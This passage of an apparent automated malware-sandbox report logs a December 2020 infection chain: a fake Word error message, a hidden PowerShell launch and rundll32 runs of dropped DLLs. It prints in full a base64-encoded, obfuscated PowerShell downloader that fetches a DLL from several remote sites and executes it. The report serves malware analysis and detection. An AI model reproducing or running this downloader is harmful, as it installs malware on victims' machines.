iADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA==
                            Imagebase:0x4a8a0000
                            File size:345088 bytes
                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:22:12:41
                            Start date:21/12/2020
                            Path:C:\Windows\System32\msg.exe
                            Wow64 process (32bit):false
                            Commandline:msg user /v Word experienced an error trying to open the file.
                            Imagebase:0xff1f0000
                            File size:26112 bytes
                            MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:22:12:42
                            Start date:21/12/2020
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA==
                            Imagebase:0x13f8e0000
                            File size:473600 bytes
                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2112271033.0000000000326000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2112362242.0000000001B54000.00000004.00000040.sdmp, Author: Florian Roth
                            Reputation:high

                            General

                            Start time:22:12:51
                            Start date:21/12/2020
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
                            Imagebase:0xffcf0000
                            File size:45568 bytes
                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:22:12:51
                            Start date:21/12/2020
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll #1
                            Imagebase:0xc70000
                            File size:44544 bytes
                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:22:12:52
                            Start date:21/12/2020
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hnzj\wmdqdo.qxu',RunDLL
                            Imagebase:0xc70000
                            File size:44544 bytes
                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Disassembly

                            Code Analysis

                            Reset < >